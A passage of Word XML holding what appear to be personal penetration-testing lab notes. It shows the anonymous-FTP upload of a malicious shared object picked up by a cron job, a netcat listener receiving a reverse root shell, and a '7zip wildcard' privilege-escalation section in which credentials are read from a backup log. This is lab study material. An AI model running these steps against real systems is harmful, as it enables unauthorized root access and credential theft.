      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024CF">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll upload our shared object to the anonymous FTP service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ ftp 192.168.120.217</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connected to 192.168.120.217.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">220 (vsFTPd 3.0.2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Name (192.168.120.217:kali): anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">331 Please specify the password.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Password:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">230 Login successful.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Remote system type is UNIX.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D8">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Using binary mode to transfer files.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024D9">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Passive mode on.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; cd pub</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">250 Directory successfully changed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; put utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">local: utils.so remote: utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024DF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">227 Entering Passive Mode (192,168,120,217,39,107).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E0">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">150 Ok to send data.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">226 Transfer complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">476 bytes sent in 0.00 secs (6.6757 MB/s)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ftp&gt; bye</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">221 Goodbye.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E6">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, we'll move our payload into the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/usr/local/lib/dev</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cp /var/ftp/pub/utils.so /usr/local/lib/dev/utils.so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024E9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we'll wait for the cron job to execute, load our payload send us our reverse root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EA">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EB">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.120.217: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024ED">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [kali] from (UNKNOWN) [192.168.120.217] 48416</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EE">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024EF">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=0(root) gid=0(root) groups=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">—--------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F4">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qh07b5qjshtc" w:id="325"/>
      <w:bookmarkEnd w:id="325"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7zip wildcard PE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId784">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Zipper</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PG Practice we had a cron job that run a bash file with these lines:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">password=`cat /root/secret`</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /var/www/html/uploads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">rm *.tmp</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1269"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">7za a /opt/backups/backup.zip -p$password -tzip *.zip &gt; /opt/backups/backup.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FD">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FE">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I don't really understand the attack fully, but all we had to do was see that the output from the 7z command was put into</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /opt/backups/backup.log </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">so we just looked there and found credentials</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000024FF">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002500">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002501">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2286000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="532" name="image518.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image518.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId785"/>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2502">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002503">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
